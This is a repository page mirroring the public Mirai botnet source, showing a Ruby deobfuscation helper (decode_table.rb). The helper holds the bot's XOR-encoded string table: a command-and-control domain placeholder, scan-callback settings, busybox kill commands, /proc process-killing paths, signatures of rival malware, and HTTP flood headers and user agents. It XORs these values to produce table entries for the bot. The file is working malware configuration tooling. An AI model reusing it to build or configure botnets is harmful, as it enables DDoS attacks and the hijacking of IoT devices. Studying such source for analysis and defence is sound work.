mirrors/Mirai-Source-Code
1
0
Fork 0
mirror of https://github.com/jgamblin/Mirai-Source-Code synced 2025-07-13 15:22:51 +00:00
Code Issues Releases Wiki Activity
Mirai-Source-Code/tools/decode_table.rb
Chuck McAuley 79720222f5 adding deobfuscator
2016-10-12 11:14:55 -04:00

59 lines
6.4 KiB
Ruby
Raw Blame History

hashtable = {
TABLE_CNC_DOMAIN: "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
TABLE_CNC_PORT: "\x22\x35",
TABLE_SCAN_CB_DOMAIN: "\x50\x47\x52\x4d\x50\x56\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
TABLE_SCAN_CB_PORT: "\x99\xc7",
TABLE_EXEC_SUCCESS: "\x4e\x4b\x51\x56\x47\x4c\x4b\x4c\x45\x02\x56\x57\x4c\x12\x22",
TABLE_KILLER_SAFE: "\x4a\x56\x56\x52\x51\x18\x0d\x0d\x5b\x4d\x57\x56\x57\x0c\x40\x47\x0d\x46\x73\x55\x16\x55\x1b\x75\x45\x7a\x41\x73\x22",
TABLE_KILLER_PROC: "\x0d\x52\x50\x4d\x41\x0d\x22",
TABLE_KILLER_EXE: "\x0d\x47\x5a\x47\x22",
TABLE_KILLER_DELETED: "\x02\x0a\x46\x47\x4e\x47\x56\x47\x46\x0b\x22",
TABLE_KILLER_FD: "\x0d\x44\x46\x22",
TABLE_KILLER_ANIME: "\x0c\x43\x4c\x4b\x4f\x47\x22",
TABLE_KILLER_STATUS: "\x0d\x51\x56\x43\x56\x57\x51\x22",
TABLE_MEM_QBOT: "\x70\x67\x72\x6d\x70\x76\x02\x07\x51\x18\x07\x51\x22",
TABLE_MEM_QBOT2: "\x6a\x76\x76\x72\x64\x6e\x6d\x6d\x66\x22",
TABLE_MEM_QBOT3: "\x6e\x6d\x6e\x6c\x6d\x65\x76\x64\x6d\x22",
TABLE_MEM_UPX: "\x7e\x5a\x17\x1a\x7e\x5a\x16\x66\x7e\x5a\x16\x67\x7e\x5a\x16\x67\x7e\x5a\x16\x11\x7e\x5a\x17\x12\x7e\x5a\x16\x14\x7e\x5a\x10\x10\x22",
TABLE_MEM_ZOLLARD: "\x58\x4d\x4e\x4e\x43\x50\x46\x22",
TABLE_MEM_REMAITEN: "\x65\x67\x76\x6e\x6d\x61\x63\x6e\x6b\x72\x22",
TABLE_SCAN_SHELL: "\x51\x4a\x47\x4e\x4e\x22",
TABLE_SCAN_ENABLE: "\x47\x4c\x43\x40\x4e\x47\x22",
TABLE_SCAN_SYSTEM: "\x51\x5b\x51\x56\x47\x4f\x22",
TABLE_SCAN_SH: "\x51\x4a\x22",
TABLE_SCAN_QUERY: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x6f\x6b\x70\x63\x6b\x22",
TABLE_SCAN_RESP: "\x6f\x6b\x70\x63\x6b\x18\x02\x43\x52\x52\x4e\x47\x56\x02\x4c\x4d\x56\x02\x44\x4d\x57\x4c\x46\x22",
TABLE_SCAN_NCORRECT: "\x4c\x41\x4d\x50\x50\x47\x41\x56\x22",
TABLE_SCAN_PS: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x52\x51\x22",
TABLE_SCAN_KILL_9: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x49\x4b\x4e\x4e\x02\x0f\x1b\x02\x22",
TABLE_ATK_VSE: "\x76\x71\x4d\x57\x50\x41\x47\x02\x67\x4c\x45\x4b\x4c\x47\x02\x73\x57\x47\x50\x5b\x22",
TABLE_ATK_RESOLVER: "\x0d\x47\x56\x41\x0d\x50\x47\x51\x4d\x4e\x54\x0c\x41\x4d\x4c\x44\x22",
TABLE_ATK_NSERV: "\x4c\x43\x4f\x47\x51\x47\x50\x54\x47\x50\x02\x22",
TABLE_ATK_KEEP_ALIVE: "\x61\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x02\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
TABLE_ATK_ACCEPT: "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5a\x56\x0d\x4a\x56\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4a\x56\x4f\x4e\x09\x5a\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4f\x4e\x19\x53\x1f\x12\x0c\x1b\x0e\x4b\x4f\x43\x45\x47\x0d\x55\x47\x40\x52\x0e\x08\x0d\x08\x19\x53\x1f\x12\x0c\x1a\x22",
TABLE_ATK_ACCEPT_LNG: "\x63\x41\x41\x47\x52\x56\x0f\x6e\x43\x4c\x45\x57\x43\x45\x47\x18\x02\x47\x4c\x0f\x77\x71\x0e\x47\x4c\x19\x53\x1f\x12\x0c\x1a\x22",
TABLE_ATK_CONTENT_TYPE: "\x61\x4d\x4c\x56\x47\x4c\x56\x0f\x76\x5b\x52\x47\x18\x02\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x0f\x55\x55\x55\x0f\x44\x4d\x50\x4f\x0f\x57\x50\x4e\x47\x4c\x41\x4d\x46\x47\x46\x22",
TABLE_ATK_SET_COOKIE: "\x51\x47\x56\x61\x4d\x4d\x49\x4b\x47\x0a\x05\x22",
TABLE_ATK_REFRESH_HDR: "\x50\x47\x44\x50\x47\x51\x4a\x18\x22",
TABLE_ATK_LOCATION_HDR: "\x4e\x4d\x41\x43\x56\x4b\x4d\x4c\x18\x22",
TABLE_ATK_SET_COOKIE_HDR: "\x51\x47\x56\x0f\x41\x4d\x4d\x49\x4b\x47\x18\x22",
TABLE_ATK_CONTENT_LENGTH_HDR: "\x41\x4d\x4c\x56\x47\x4c\x56\x0f\x4e\x47\x4c\x45\x56\x4a\x18\x22",
TABLE_ATK_TRANSFER_ENCODING_HDR: "\x56\x50\x43\x4c\x51\x44\x47\x50\x0f\x47\x4c\x41\x4d\x46\x4b\x4c\x45\x18\x22",
TABLE_ATK_CHUNKED: "\x41\x4a\x57\x4c\x49\x47\x46\x22",
TABLE_ATK_KEEP_ALIVE_HDR: "\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
TABLE_ATK_CONNECTION_HDR: "\x41\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x22",
TABLE_ATK_DOSARREST: "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4d\x51\x43\x50\x50\x47\x51\x56\x22",
TABLE_ATK_CLOUDFLARE_NGINX: "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4e\x4d\x57\x46\x44\x4e\x43\x50\x47\x0f\x4c\x45\x4b\x4c\x5a\x22",
TABLE_HTTP_ONE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_TWO: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_THREE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_FOUR: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_FIVE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x6f\x43\x41\x4b\x4c\x56\x4d\x51\x4a\x19\x02\x6b\x4c\x56\x47\x4e\x02\x6f\x43\x41\x02\x6d\x71\x02\x7a\x02\x13\x12\x7d\x13\x13\x7d\x14\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x14\x12\x13\x0c\x15\x0c\x15\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x74\x47\x50\x51\x4b\x4d\x4c\x0d\x1b\x0c\x13\x0c\x10\x02\x71\x43\x44\x43\x50\x4b\x0d\x14\x12\x13\x0c\x15\x0c\x15\x22"
}
hashtable.each { |key, value|
decode_value = []
value.each_byte { |bite| decode_value << "\\x%02x" % (bite ^ 0x22) }
puts "add_entry(#{key}, \"#{decode_value.join}\", #{value.length});"
}
Reference in New Issue View Git Blame Copy Permalink